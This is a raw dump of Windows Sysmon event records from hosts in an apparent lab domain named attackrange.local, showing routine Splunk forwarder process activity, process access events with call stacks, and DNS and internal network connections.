Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000080832Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:34.740{2FDD8D40-B196-615A-3001-00000000FD01}840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000080831Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:34.286{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EA0187D64D2BE62919C5BEF39F898001,SHA256=EDC175B50E7A37DCFF485973FA68BD2C9A74EE50502797390BCD7EFCEA38F00B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102951Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:31.878{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local52482-false10.0.1.14win-dc-639.attackrange.local53domain 354300x8000000000000000102950Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:31.878{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-639.attackrange.local53domainfalse10.0.1.14win-dc-639.attackrange.local52482- 354300x8000000000000000102949Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:31.878{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruea00:10e:0:0:98d0:cb7e:b94:ffff-52482-truea00:10e:0:0:0:0:0:0win-dc-639.attackrange.local53domain 354300x8000000000000000102948Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:31.878{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local59994- 354300x8000000000000000102947Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:31.877{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local57971-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domain 10341000x800000000000000080862Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:35.930{2FDD8D40-B197-615A-3101-00000000FD01}39082304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080861Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:35.821{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25AB8D3F1A9B9DCF12175928D6C4765F,SHA256=35B4A05B5E1F306A80BD354EAB53E67698674A477972426261EB5545B1D717D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102953Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:35.265{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2C605E8E9D9626F1C8A4BE0C8FBBD97,SHA256=2C81B90D5062DC7283D375115AAC4423D0667DD794939A9D274700782F07E690,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080860Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:35.790{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B197-615A-3101-00000000FD01}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080859Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:35.790{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080858Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:35.790{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080857Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:35.790{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080856Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:35.790{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080855Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:35.790{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080854Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:35.790{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080853Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:35.790{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080852Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:35.790{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080851Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:35.790{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B197-615A-3101-00000000FD01}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080850Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:35.790{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080849Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:35.790{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B197-615A-3101-00000000FD01}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000080848Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:35.791{2FDD8D40-B197-615A-3101-00000000FD01}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000080847Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:35.774{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68603EAE7B48B5512CAA45694F076203,SHA256=F149CC0527088C8052F5C0F99FFF0189425BB8871E4B67082EEE93E08CD754BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080879Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:34.760{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49988-false10.0.1.12-8000- 23542300x800000000000000080878Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:36.821{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B98E98B2611B157247A7651D4C344D3D,SHA256=EA05AD53289AAC44247B0B8DB18534F383BB2F46948236CE4728E3F276630F06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102956Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:36.279{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55A5DBB7DDEE7C81F11BC6A9E7D4BEA3,SHA256=1F16805BF9CDD3EE817D2748A32BEA521BE547B9EF595A0816C5B3682FA5F7CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080877Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:36.790{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=727BB0445510CEFADEC5EB9061AFC6BB,SHA256=AEA025DB20C7F04244C7F47329C2F7099EEC040018ED14C8AF45C5C94669F4A7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080876Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:36.727{2FDD8D40-B198-615A-3201-00000000FD01}10601456C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080875Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:36.571{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B198-615A-3201-00000000FD01}1060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080874Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:36.571{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080873Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:36.571{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080872Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:36.571{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080871Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:36.571{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 